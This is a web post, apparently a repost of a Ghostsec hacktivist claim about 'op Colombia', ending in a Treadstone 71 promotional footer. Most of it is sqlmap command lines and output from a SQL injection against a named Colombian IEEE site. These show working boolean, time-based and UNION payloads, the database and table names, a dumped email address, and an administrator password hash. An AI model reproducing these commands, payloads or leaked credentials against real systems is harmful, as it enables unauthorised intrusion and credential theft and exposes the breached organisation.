Ghostsec quiere decirle a Colombia, que encontramos una clave del jefe y un email del fbi.. op Colombia tiene el apoyo de nosotros (Ghostsec) para siempre… Ghost sec no está del lado de la corrupción en ningún momento, y seguiremos esponiendo cuanto profunda la corrupción es en Colombia…

Ghostsec wants to tell Colombia that we found a password from the admin and an email from the fbi .. op Colombia has the support of us (Ghostsec) forever … Ghost sec is not on the side of corruption at any time, and we will continue to search how deep the corruption is in Colombia …

sqlmap -u sqlmap -u https://www.ieee.org.co/evento.php?id=66 -D u476527422_ieeecoldb -T emails –columns

┌──(kali㉿kali)-[~] └─$ sqlmap -u sqlmap -u https://www.ieee.org.co/evento.php?id=66 -D u476527422_ieeecoldb -T emails -C emailafiliacion –dump
___
__H__
___ ___[(]_____ ___ ___ {1.5.2#stable}
|_ -| . [,] | .’| . |
|___|_ [,]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:21:06 /2021-07-21/

[16:21:06] [INFO] resuming back-end DBMS ‘mysql’
[16:21:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own (‘PHPSESSID=2tt3edl60f3…4sksrhic20′). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=66 AND 6772=6772

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=66 AND (SELECT 3557 FROM (SELECT(SLEEP(5)))RMpq)

Type: UNION query
Title: Generic UNION query (NULL) – 18 columns
Payload: id=-7658 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x716b50536f746b7a7473786d4575744b7847474947785a647247424c44484a4c68524f7663417963,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– –

[16:21:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP, LiteSpeed, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:21:15] [INFO] fetching entries of column(s) ’emailafiliacion’ for table ’emails’ in database ‘u476527422_ieeecoldb’
got a 302 redirect to ‘http://www.ieee-tdla.org’. Do you want to follow? [Y/n] y
[16:21:20] [WARNING] reflective value(s) found and filtering out
Database: u476527422_ieeecoldb
Table: emails
[1 entry] +————————————–+
| emailafiliacion |
+————————————–+
| cybersecurity.fbi.gov@protonmail.com |
+————————————–+

[16:21:22] [INFO] table ‘u476527422_ieeecoldb.emails’ dumped to CSV file ‘/home/kali/.local/share/sqlmap/output/www.ieee.org.co/dump/u476527422_ieeecoldb/emails.csv’
[16:21:22] [INFO] fetched data logged to text files under ‘/home/kali/.local/share/sqlmap/output/www.ieee.org.co’

[*] ending @ 16:21:22 /2021-07-21/

PicsArt_10-07-07.10.19.jpg

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=66 AND 6772=6772

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=66 AND (SELECT 3557 FROM (SELECT(SLEEP(5)))RMpq)

Type: UNION query
Title: Generic UNION query (NULL) – 18 columns
Payload: id=-7658 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x716b50536f746b7a7473786d4575744b7847474947785a647247424c44484a4c68524f7663417963,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– –

[15:03:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, LiteSpeed, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:03:57] [INFO] fetching entries of column(s) ‘clave’ for table ‘usuariosadmin’ in database ‘u476527422_ieeecoldb’
got a 302 redirect to ‘http://www.ieee-tdla.org’. Do you want to follow? [Y/n] y
[15:04:00] [WARNING] reflective value(s) found and filtering out
Database: u476527422_ieeecoldb
Table: usuariosadmin
[1 entry] +—————+
| clave |
+—————+
| ncquzy3B/E.6A |
+—————+

[15:04:03] [INFO] table ‘u476527422_ieeecoldb.usuariosadmin’ dumped to CSV file ‘/home/kali/.local/share/sqlmap/output/www.ieee.org.co/dump/u476527422_ieeecoldb/usuariosadmin.csv’
[15:04:03] [INFO] fetched data logged to text files under ‘/home/kali/.local/share/sqlmap/output/www.ieee.org.co’

By Treadstone 71

@Treadstone71LLC Cognitive Warfare Training, Intelligence and Counterintelligence Tradecraft, Influence Operations, Cyber Operations, OSINT,OPSEC, Darknet, Deepweb, Clandestine Cyber HUMINT, customized training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, Disinformation detection, Analysis as a Service